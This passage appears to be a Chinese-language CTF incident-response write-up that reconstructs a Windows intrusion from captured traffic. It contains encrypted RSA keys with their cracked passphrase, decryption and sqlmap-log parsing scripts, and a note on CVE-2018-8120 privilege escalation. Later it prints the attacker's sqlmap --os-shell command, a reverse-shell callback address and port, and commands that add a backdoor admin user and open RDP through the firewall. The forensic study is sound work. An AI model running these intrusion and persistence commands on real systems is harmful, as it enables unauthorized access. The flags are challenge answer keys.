zZiyvvjF3iF3aNKqhTu4vMQIbOIkVX8TNOhDQTMGzTVNExPaJhl7y6TL / oSjfyqT
zH83mbT19vbj0 / 6 ZoFxTOPvb4Nl0fJ0akak8RMWGrQruPQymaNiJK + xHA3T0m + 7 h
b9gGkEdZosK / 1 A6ZWtOxIAxOZljca85zo1pjuXKMFeLbfpzYXEEnOf4fa0x7qwvG
usOmzznZLvjJukyzjqqj3bxbxZttv4RvGVkgLvDcFXabllsRb1Kf3VDVrtce59e8
gZLpQkn / wKK + yOh0uWZ3cif6yP8EGAr / w + O2YyKyAW4AOB / pNdFLrIBrRJB8VyAp
----- END RSA PRIVATE KEY -----
�
7 ----- BEGIN RSA PRIVATE KEY -----
Proc - Type : 4 , ENCRYPTED
DEK - Info : AES - 256 - CBC , 00 CC3CEB341608BCB606C10E204BB464
z4wxB9ZxO9EP0QviHb82uD7UVwH8yTy65CCKgue + 3 Dg1d4Hk2FCPHKIfgfwFnbF8
paeEcyM3fzNJ4 / 5 MXdQeq6n3N + 2 KbmxpaCqMhHpQo2KWJKCPiRmxq2B / f8lSMOe4
WR3vz7rFCWA + 9 J8 + EZ2pZIIIJG6o2Lbkaw / 4 zSa3sHOjap6tgP9vF / Aq + MosnxCZ
OF6MdZgrV5y + bjkRcsw4d6UH26NEGiXJ3Dj6l2OZFol3ut3AC12pYgr3z4HqVney
vWeMFGsfxWQhKBe1WbyM6fmtm5R2AHXQP6VFSSulaCIOh2Cca8D5 + BLvEIKmpZQw
/ EVmBADHJF9ZF1CgC4uAbVyGm640kRsw / XNsl9UdrQO5Eih + dpaJOH4UHgrDCGTW
Dr3fS8LGz1G5 + vyTtNYP51CF1EoOjxVRoF4YMSibeS02W / Ky86IZwb3w0TYEJlZR
wt33ThAys + KweU4cFEO4DQw94TTOgixZweqmYccHadCSYKn4vtT96M + ERzGsldNb
+ 9 rEKFNZPWuHvQlYtadCHXiuuVkN0dCFP8ll7w + AH2OUfS9HkNkjJT4sMaImTUZK
heI4BSWpzAbi2yx47HDgzviteg30bmTI6OLLoV17lr76BrDjlGA9 + kSUFhiaRy9H
pGU3ehaW2 + IhUjnvj1cHkHTUoEmZiC1s51P5Qf5zut0TT0yBKnfRA / hLCmsbrM + w
G4ZpEQd0LaBnLI10QjKX5lseUUaWKwhuLU / az2RIidVW + Mr8AgkhboMFwPx9S2C7
MB83tBOn816pvksWlmfzGYDU5qJ8hakxntFTXbf4UFI / OdH7TbHFE3mobkxt0HsW
Oj3PFuKT2xsTCYCHSAiFM / gmlEFxceanFO5harCaRrz + iBiDCrFWU2gAMUdwzLBE
lg + vzrymBlvYTszCw + CBNAiKBwgROjfvC0GZJk0my225vhmbPXdAfqpdPFGFO5X0
R0ShEf7lfrxUvsrgej + yMNSg6 + 2 + PqBQyvX + lzfKWbUUCMXYX7W0MT6najrxX + Ei
kmmxHJQW / X0qJXvbxD / eCxmlk64GkJPqXBJWC + 414 a3kZQ7mwr5GdLNSWD8Tff6Z
ASedejB7vq / mNaZ0uyVZFeoDsM4R1c / Pg7Ir2WuEvchFG3QuiykIBElKv2x2zsbf
yRYNQCGUQphPW3wN5slObZMZvYEGEIKnfbMb7bsKt3XPC71CYtQ / VqjJs / zPE1yV
ycMyj14z + 2 TQPvRW8IxAotRfzrBOFluPsejmsvIT + FMj8DIxmrCvDH3Hi2Iwn3Ys
D7Y + Nlo6oEUuwxedYPYbluxdVIVfoPCIKsi5RpLupu1L8BxsqLWKLlR7dpDL / xab
Tths6MaK9PA2b6QxtBFed1mNPjhMvD9OHn65TxmboSkJ9Lu8OWYXpQ544vqb951g
BPTnZ1MJvw7YyZZ0lEkf5euE83rT9hosfV0VLG3sYqkobQSyWLxGtYz4 / YUQ1EOw
/ Vev + M7fXUv943gdDFQV1C4dKNXAc4lTUYcx7nQMIZnP0vqro6lpM7DWceGom + 2 A
LPUYSfsR9g3S7aCX2yav89rmOCNdKn7CLOLV6KhzT0XU1CJXzl + DleYJnhFLWYV5
----- END RSA PRIVATE KEY -----
�
8 ----- BEGIN RSA PRIVATE KEY -----
Proc - Type : 4 , ENCRYPTED
DEK - Info : AES - 256 - CBC , E1AA9F2E537B7DE8EA3C74DC1D993741
4 m9RCc09FV / okcYyXTus3M + JHzMg + vCynmIY3nyS5ar + trumXolLgTlYsbpb9rZE
PXzF5IlHAgqlBqK7qU2Hj2YUBtr6kBpv7rRYgy17AiEOxfLajemf + urMAJ3UG1v4
BeS0iVP09GqvlW869tN9dGn2Fze51bdU2XKjcowfrVIrun / 0 Ge8TgZpI + Ff2Bsaz
RNaSeyPq + 15 zgEgC6svpjTKG + jNJAos9cKx8xsi0DEV / 25 YTTfv3mgdX9UdAY93s
vMDeI5fEu + p + pd + i4iuEifq / VAX0lGWscoeYlEp5FbFLiP8B0jqW0NpafJ4W5nS0
3 E +/ YMHdiNApZ1NHZsG3noiPyg0 + 9 di81nuSKj1Ordy7r / KHiqVXRa / ALTr9Q8Nf
81 Ox5bvFqfTAuTdMY + rsLlkR / Uj4wF1MQhGyI + 8 iPaPDS543Mg2Oh039NwjZhEZb
xP5mbTfN36TUkQFrtj2jV97kSIym3DuPP0xpMZuw2hKHe0IuxmrU02BwEDzksaDG
0 D1KJCiGhbmzhHZbfMmGdhBJuuq0TNVlgQONeB0KsQWDCkcqx3bqfm8I / lSJ + KF5
p5X / GL50P1rhJvHuY2CutLeG0mpqVI / cUf2sll91KGigZkzxeDDcdfKNRmWQLi3g
ANnpYsPLOyYVW67I7WHsRx56hDo2TJt1iWQH6cjnW5bSvWLJGg + lnTeAkRC6M6Yn
ShdbHY5fkhTospAr9LspXFHz2Ec5EjecikPkd7aGYvcUMpJxQWtSSuCs2Al2xFy /
6 iX + IygVT + 9 ImrL7joH7TjOucZjGwZETrAxcEwF3jsQncMg + 13 WleszcMFZT6CuI
ex + 7 MMM4JyuTQacIYUaek4Irl2ed6t16rYRD0wHdWhCa7ZdRW82BvrAQxkTiYF + K
X2mbjePOUNVQKL75LvPs5xUN9nEVGKIuqz6lLjqs / YlJiZONWnhiLD1fdU9xhs3X
oN7BV + eA8HP1HTeDoNkC3BpcYQg1Twi4yAwATUcT6 + X9JoHvP0V3tgih4s5x02C +
l3CIPV8JWzYi1MI0f7T4oyZHIzwSr1nL4CdVvvSwYzZsFO0 + R4I0vuoADOEIbeS +
9 u + cCETr6xS + WGjj + 3 GnrDNxUHidVMi0pv999 / OPzoE57 + 4 / XfjxZCyDgjf68wD +
66 k1XXpa57kytn / YEnHXBoVUC2Odb9kw6EyEzlSilulLRrXES7bO4nB1 + zMHJf4b
KGpoVPAKVrbfNo1W7A / ivjNkuYqtbw6RrwLtwuekAg5gDnIt345Q7S0uOLsNhIcy
E6wDQdQ6dIqhlfDTi68zzajmnhMw3FXzEEGLaAij + ecLiWIDm4noIIaXGLDv1JU /
WH1pqUK4khJx3 / sWccno0ogmtVY7SiyScDR1qtsMe2pdINnrw601gBYITFmHJFVQ
tsGbu4ie9Vuno8q / k1GCIYOqpnJcU +/ ra / XCqH8ljMMzVP5iYzxE2y + 4 vUfuogSr
gOohvgpKgEy4 + onGVncQ9hgPRlebsbahJKj44E + dcP3uWGqHPwo9LaDErf4p6X71
MT0ysUlIh5Wq1coTaoyI4 / suDbg + 7 KkPLzeEUg0P57Dn57Zc1pcXf / lsD8NYnC3v
----- END RSA PRIVATE KEY -----
�
9 ----- BEGIN RSA PRIVATE KEY -----
Proc - Type : 4 , ENCRYPTED
DEK - Info : AES - 256 - CBC , 17 CE8B0206D9BD37B674CA0539031A1F
VAoOMhu6dtB / FxUHOd / ZBzh / qqk5jduOXkjMpV9s00dDka6R4TqjbT9TJd1eGMj7
XPwI50Looj1EPStgM7eaYh6UC5LdzKK9O02GE / eYaSelRnbeYb5RxtlYBtjirwD5
VLIQw3YGiA8A8CUPoS8cC ++ 3 EaT58PH1g9Hfu2errbkr0QPqymOr5oQOCw / aIj9L
UVAtaZbO0SWf8LeF0fs809FdJzA / Pl2fkVuZlBn2b5owiEEPILWqPU3y / mAaT1KB
hen4CW / 0 PM2tlOa / w5t8XWGErnb2bbWSrnMoVdvK1yngDMEYRV / dSzRiwcal3NK2
4 FqLS5KAoy4I2FicKmGhC86ZemaSsAI / lFpH0tva31USPFZlblb + GgWz15bho0hn
nQ / M751l3PahPU / INqO61wE9UbHWwaiypjQGvJyjnLpbIrqqPj77vX47MEy22KKe
8 TJWpkzsPpK0ph3yaehF8IRDfh1PGuSX60i7Y8S + AcfJi7Afm4sKFuM1L + 8 wGwmX
eibM5QGb + LtryxznnPHwFUC07zWl2t24VKvek4PVkVAUBxlnuLMPhN + B4iYwykMH
cSLnyY0K5ODz6U8sG9R8JKfbPAguoNkaRRjHKPQkNxPz4Lq7BDmB5cVkDnTGnqNN
T2xQurjdMauH5R0eSjatkgJ1ktf2bh26aUs + pKTTvQnJ3cYvl / SblK3IetCI + dkD
xkLNu9Pqkfk8Lhu9SDPMru3DY / zlMQFtgVsrYFT4YOuEc + 6 Ng4Nv8lYfJsGN + uGc
wsyOBkcRXs4SsxDQemRYW / nCkyDT1AQ + bYC1Bf3puaFh / 8 KxW2K7 / aaA1iqh7Z4b
Jk / OhgoV3uTlCtnYCfjqoPWMAmWr1XhhiiDT0amUs81RSZyg4Z / mS2IXC / C3OTmr
DNk + N2 + ckSgSEStKil0pBHAkv22q528m3AHI6uwrvVVeNKmoeyaOVMzEL7zGkcQm
RXOvcdVb8XRqfWI9jERpHzeT41TbOwPb7iZBvQJV5j0AIJxmzFIkhmeyX3sltx01
SsnP4QX40lKi0pPSp3PSBn3qCW9FekI6 / OfAwV4BXT2WYviMiQqlvuhqcFuLIhfy
TxMwDxvmzNXXT1mh064LLe05RLM0FPjMjtjIc + DYulVP9tMTaZmADQsYnXOAaiG2
9 P0uM4j + jSD6y5xEpNTfpYfId2ZgMKiQwaKYo9Hqh9WwX2CMw4rEyEWln7cUbCQc
zoK63oc6g8SfrBor7WTHvUZonWd7U67I + 9 Dd8NSVztFwuKl2USnFmfk38geYnWTy
1 VWk3dpntamxC88IrYyM + GhOlfOoLQF9E2m4Ugul6OD95CKUa8oZ95idO0p8vh4N
8 ET + NL72yZuJgTkOD76OvkS / dJLmeRgtLiQZ8OB9jnYmGSt47bnpZf9rkNjF1ma7
vTvsIoWm1P9kDisIiIH5A3en / U7 + IB + hMiXXKtgqS9UB9YhdPcxSTRz / ZOf0EULB
EEdqNraikJh78cEcHALvOzSpyW1PtwCD9HAnqlg4YfNRs + BULLxhyKyd6eBeOUdR
SYRDV6hpDekkehDm4GU0ACm8FjiGMzuZTO4Sit1JoYr2D6qMTxmCT89HRKLO1zsq
----- END RSA PRIVATE KEY -----
�
10 ----- BEGIN RSA PRIVATE KEY -----
Proc - Type : 4 , ENCRYPTED
DEK - Info : AES - 256 - CBC , 2 A6FAAF58E62F6B37BDF164E45ED7C19
LykvMnsrgtiurjZJWzptVyXmTEoNCryIk88vTYrqNZozVOcCVkuV8PSAZs3aoXqt
MSHU / LY8SYlB7nw8iUKtT5PCaPRyt2FL2bzWbsTBeUaMuApnIOKN2 / d + OfVhAXon
89 G9Ztz3nOagEjXq77upi93vL2uv3FKn4O + TvCEz4 + kXYC0usb9zlunuZVqEjS6M
diHe + wWLMLCBob0xcPfXKL8HAPcInZoeB8BYfdEHhv4imrXPpSfc1gL6z7frxrpw
sJ + no7BXnhjBVDuEvBadnrifOfwo8HV / apzMhpBYJDqQB8mwgREMLu9LpBh + POPK
b2yOJEgR6Gb1C4R8CEu9BWn87EQhiLYmRiZyK8OOrT95 + EpjpBGk41HpXNLaWWz2
+ wI5JHJLbF0M + gaoAlZHwITEY + Zfj0dEXu46gzTBam / CUCVXCiNV + QNovB0Kud3g
CWboW2UUl5Lx4rGdnqLWoQILKGmPFH / hySntMQbiX + PKTqeoSQyXOja9Y4gr8JQ1
HTmAf30YHN4FNXGFVNvX8oY55BvSaqcHdAw + w / QZpK9teniIu3jnvMJOI1WPeY6g
3 XKeVCCAI0FyC2kS4slT0J5gTczO73OAic5YmxYDB2FFMTtfvRPaO5NKXylTWYRA
VYtfYBWvS6VD5ZD8t8BcKYDJWipJnWg9QNJyelYZFHzqGdvi2iHXOOx755bcULuV
jIricKScVey3rys32zELbfslmzNhBYLmWwjcvCEsrYwxS94bi2q68UC + uX1keX9L
Vv2zAnGxZjgCeNHPKlA6ujs306dd3Ex6dJ1zL / irEosjbgD9mhcb0QLwe61eXphq
dBpQE6ghvkKOyFSLSqSLYNB8Rhsii / HO1dqC / XDsE5h8RBhNzv1cL808mW0MtHPu
707 Z4WB + 8 BYQ9oxbSXeNGn6NerlSOOprPlmocJU3iy7b / qUu0bknVjcOKK5E1Pp +
48 HgTQ0lSV7V1ZOxzr6NutX6ZBx / PI60x0MbBeWVoKoNewmUp9QP9PjYGZjsd6N9
l9Gc8XTW3GplpwuPu12ACYMhppJZZTD + tnq9OlhCTurwYyIgpRsONmvdHo / 0 Mza5
RXzu8aAwCMsg7ZOQqD4tpPndOQ2rBugWaIT8M7aTBEpwWi3ETY7soEauh6hLc1jB
FyXKZpv70QcmL5P3HnXgZ3AQDSBeCSXW2gc10VYdcPyAK4r5c + yzIhhJqXS18QnX
1 hHtnhVum1Tzik / wvfjPj74s4kXbrPB41XZIBDA8ONzV8a1QSDY / qC6kJYCNnMZv
BComWEqKdAFGPmvsRhU5NRz2LAhnZv66t7THDqsTvFrRwLSDke92qy7OCpQ / dWhh
4 Zpu41yD76pUJNWtpjx05NiInslnDqoKIzNWs + TfiJz6K33Ce3Kgnj2l9Fl / v4fO
4 Aa + GvAlPtzEICjNt / L4 + fDa // D7ng97aKAste01msQ1zUKhQg9zSFXfTC9gK2w3
6 ZVVsARehC36AlpzNEi3SNjTMdk + gmxKhhkx90s + ljeyYg1WovAqpVc9bFV5xp7k
tRsK51nptWU530QfPLxupCRx + f3RhZL5ya9UuzUqF1sO0KUAMrnUAF5sy ++ PPx / n
----- END RSA PRIVATE KEY -----
�
但是私钥有密码,使用rockyou字典爆破私钥密码得到为 trizzle420
整理后rsa批量解密
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
import base64
# 解密 RSA 私钥
def load_encrypted_private_key ( pem_data , password ):
try :
private_key = load_pem_private_key (
pem_data ,
password = password . encode (), # 密钥密码
backend = default_backend ()
)
return private_key
except Exception as e :
print ( f "加载私钥失败: { e } " )
return None
# 解密函数
def decrypt_message ( private_key , encrypted_base64_message ):
try :
encrypted_message = base64 . b64decode ( encrypted_base64_message )
decrypted_message = private_key . decrypt (
encrypted_message ,
padding . PKCS1v15 ()
)
return decrypted_message . decode ()
except Exception as e :
print ( f "解密失败: { e } " )
return None
for i in range ( 1 , 11 ):
# 输入 RSA 私钥 (PEM 格式)
priva_file = f "./priv_key/ { i } .pem"
priva_f = open ( priva_file , "r" ) . read ()
private_key_pem = priva_f . encode ()
# 密文 (Base64 编码的字符串)
encry_file = f "./answer/flag { i } .txt"
encry_f = open ( encry_file , "r" ) . read ()
encrypted_base64_message = encry_f
# print(priva_f.encode(),encry_f)
# 密钥密码
password = "trizzle420"
# 加载加密私钥
private_key = load_encrypted_private_key ( private_key_pem , password )
if private_key :
# 解密消息
decrypted_message = decrypt_message ( private_key , encrypted_base64_message )
if decrypted_message :
print ( f "解密成功,明文为: { decrypted_message } " )
else :
print ( "解密失败,无法还原明文。" )
else :
print ( "加载私钥失败,请检查密钥和密码是否正确。" )
1
flag { 030 b129927a919e1563d5e2051766e3a }
3.黑客获取的系统权限是什么?(提交md5值)
找到whoami的数据流, 提取出后面的判断输出数据流
还是简单写个小脚本提取输出数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import re
f = open ( './out.log' , 'r' ) . readlines ()
a = "sqlmapoutput ORDER BY id) ORDER BY id"
test_dict = {}
for i in f :
if a in i :
ret_length = i . strip () . split ( ' ' )[ - 1 ]
row , fuzz_index , fuzz_num = ( re . findall ( r 'id\),(.*?),(.*?)\)\)>(.*?)\)' , i . strip ()))[ 0 ]
# print(row, fuzz_num)
if row not in test_dict :
test_dict [ row ] = {}
if fuzz_index not in test_dict [ row ]:
test_dict [ row ][ fuzz_index ] = { 'fuzz_num' : 0x00 }
# print(test_dict[row][fuzz_index])
if ret_length == '416' : # 大于CHAR(n)
test_dict [ row ][ fuzz_index ][ 'fuzz_num' ] = int ( fuzz_num ) + 1
elif ret_length == '405' : # 小于等于CHAR(n)
test_dict [ row ][ fuzz_index ][ 'fuzz_num' ] = int ( fuzz_num )
res = ''
for row in test_dict :
# print(row+" ",end='')
for fuzz_index in test_dict [ row ]:
res += chr ( test_dict [ row ][ fuzz_index ][ 'fuzz_num' ])
print ( res )
得到flag为nt authority\network service
1
2
md5 ( nt authority \network service )
flag { a708a96b4e62356ee21f5641ac0b0698 }
4.找到黑客使用的CVE编号提交
发现有下载exe,得到cve编号
搜索发现这个cve使用来提权的,然后用这个程序执行whoami
继续提取输出,验证到是用来提权的
得到flag为CVE-2018-8120
5.黑客留下后门的反连的IP和PORT是什么?(flag{IP|PORT})
继续分析,发现还下载了一个2.exe文件
然后使用提权工具运行
直接提取2.exe
微步沙箱分析
得到ip和port
得到flag为192.168.31.147|1177
1
flag { 192.168.31.147 | 1177 }
6.找到黑客留下的后门用户和密码提交(flag{用户名|密码})
1
2
3
4
5
6
7
8
9
10
net user xiaole Xia0le @ 123. / add
net localgroup administrators xiaole / add
开启3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" / t REG_DWORD / v portnumber / d 3389 / f
wmic RDTOGGLE WHERE ServerName = '%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name = "Remote Desktop" protocol = TCP dir = in localport = 3389 action = allow
关闭3389
wmic RDTOGGLE WHERE ServerName = '%COMPUTERNAME%' call SetAllowTSConnections 0
过滤刚刚分析得到的ip和port
1
ip . addr == 192.168.31.147 and tcp . port == 1177
追踪tcp流发现上线后的是system权限,而且新建了一个xiaole后门用户,然后将用户添加到管理员组
下面是开启远程端口,防火墙把3389放行
得到flag为xiaole|Xia0le@123.
1
flag { xiaole | Xia0le @ 123. }
7.获取系统桌面上的flag.txt文件内容提交
sqlmap注入拿shell
1
$ python3 sqlmap . py - r 1. txt - p "user_id" -- dbms = mssql -- os - shell
得到system权限
新建后门用户开启远程桌面
1
2
3
4
5
6
7
net user xiaole Xia0le @ 123. / add
net localgroup administrators xiaole / add
开启3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" / t REG_DWORD / v portnumber / d 3389 / f
wmic RDTOGGLE WHERE ServerName = '%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name = "Remote Desktop" protocol = TCP dir = in localport = 3389 action = allow
RDP连接得到flag
md5(mssql_desktop_flag)
1
flag { 00e6 d4aad62433b264b56a50c7754f49 }
8.找到黑客留下的后门名称和木马路径并提交
排查计划任务发现后门木马
